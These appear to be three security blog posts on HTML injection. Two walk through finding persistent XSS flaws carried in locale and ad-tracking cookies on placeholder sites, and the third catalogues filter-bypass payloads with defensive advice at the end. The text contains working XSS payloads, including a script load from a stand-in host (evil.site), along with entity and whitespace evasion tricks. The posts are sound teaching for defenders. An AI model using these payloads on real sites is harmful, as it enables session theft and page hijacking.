Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encoding like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)Namárië

A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment — which doesn’t make a round trip to the web site — isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

http://web.site/page.do?locale=en_US

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

http://web.site/page.do?locale=en_US%22%3E%3Cscript%3Ealert%289%29%3C/script%3E

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%3Ealert(9)%3C/script%3E%0A%0D

The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body> :

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&# 034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

">

And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&# 034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

"></span>

And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example, we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script>alert(9)</script>

" xml:lang="en-US">

<script>alert(9)</script>

">
<head>

And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!--  Include the Reference Page Tag script -->
<!--//BEGIN REFERENCE PAGE TAG SCRIPT-->
<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US"&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

';
</script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

http://web.site/page.do?locale=en_US”>%0A%0D';alert(9)//

Too bad the apostrophe character (‘) remains encoded:

<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US&# 034;&gt;

&# 039;;alert(9)//';
</script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%20src=%22http://evil.site/%22%3E%3C/script%3E%0A%0D

As expected, the page.do’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&# 034;&gt;

&lt;script src=&# 034;http://evil.site/&# 034;&gt;&lt;/script&gt;

">

But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by evil.site.

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script src="http://evil.site/"></script>

" xml:lang="en-US">

<script src="http://evil.site/"></script>

">
<head>

Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload — it’s just

http://web.site/contactUs.do

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A;
        JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
        sessionLocale="en_US\">  <script src=\"http://evil.site/\"></script>  ";
        exScreenRes=done

Sometime between the request to page.do and the contact page the site decided to take the locale parameter from page.do and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale. The locale isn’t as picturesque as Hogwarts, nor as destitute as District 12, but Hermione and Katniss would rip apart a vuln like this.Hermione's Exam Schedule

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert:

http://web.site/page.aspx?om=alert(9)

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And — spoiler alert — not in the following script block:

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop4="quote";
s.events="event2";
s.pageName="quote1";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site. Just visiting them as any user might without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

http://web.site/wacky/archives/2012/cute_animal.aspx

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17="alert(9)";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!).

http://web.site/page.aspx?om=”%2balert(9)%2b”

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click to Show Page Source we’re greeted with that happy hacker greeting, the friendly alert() window.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17=""+alert(9)+"";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page) we narrow the persistent carrier to a cookie value. The cookie is a long string of hexadecimal digits whose length and content does not change between requests. This is a good hint that it’s some sort of UUID that points to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.

So, we have a persistent HTML injection tied to a user-tracking cookie. A diminishing factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice it we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Implicit HTML, Explicit Injection

When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.

It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when it encounters unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.

One of HTML5’s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies — giving us a world where sites worked well with one and only one version of Internet Explorer (or Mozilla, etc.). A great deal of blame lays at the feet of site developers who refused to consider good HTML design patterns in favor of the principle of Code Relying on Advanced Persistent Stubbornness.

Parsing Disharmony

Untidy markup is a security hazard. It makes HTML injection vulnerabilities more difficult to detect and block, especially for regex-based countermeasures.

Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on anything other than a narrowly-focused regex becomes unwieldy at best.

First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the img tag:

<img/alt=""src="."onerror=alert(9)>

Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering strange parsing territory. For some sites, this will be a trip to the undiscovered country.

Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The id attribute has an unquoted value, so we separate it from the subsequent attribute with a space. The href has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we put onclick immediately after.

<a""id=a href=""onclick=alert(9)>foo</a>

User-Agents try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:

<script/<a>alert(9)</script> 

We can adjust the end tag if there’s a filter watching for </script>. Note there is a space between the last </script and </a>.

<script/<a>alert(9)</script </a>

Successful HTML injection thrives on bad mark-up to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s %0d%0a into \r\n (carriage return, line feed) when it places the payload into HTML, then the browser might execute the alert function.

<script%0d%0aalert(9)</script>

Or you might be able to separate the lack of closing > character from the alert function with an intermediate HTML comment:

<script%20<!--%20-->alert(9)</script>

The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a javascript: scheme with a line feed.

<div id=mycode style="BACKGROUND: url('java 
script:eval(document.all.mycode.expr)')" expr="alert(9)"></div>

Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.

<a href=""&amp;/onclick=alert(9)>foo</a>

HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three JavaScript schemes use an entity for the “s” character:

java&#115;cript:alert(9)
java&#x73;cript:alert(9)
java&#x0073;cript:alert(9)

The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.

Security

User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.

  • Fix the vulnerability, not the exploit.
    It’s not uncommon for developers to blacklist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
  • Test with multiple browsers.
    A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
  • Prefer parsing to regex patterns.
    Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
  • Encode characters.
    You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like < and > and prevent quotes from breaking attribute values.
  • Enforce rules strictly.
    Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.

HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, by not so myopic that they miss “improper” HTML constructs that a browser will happily render.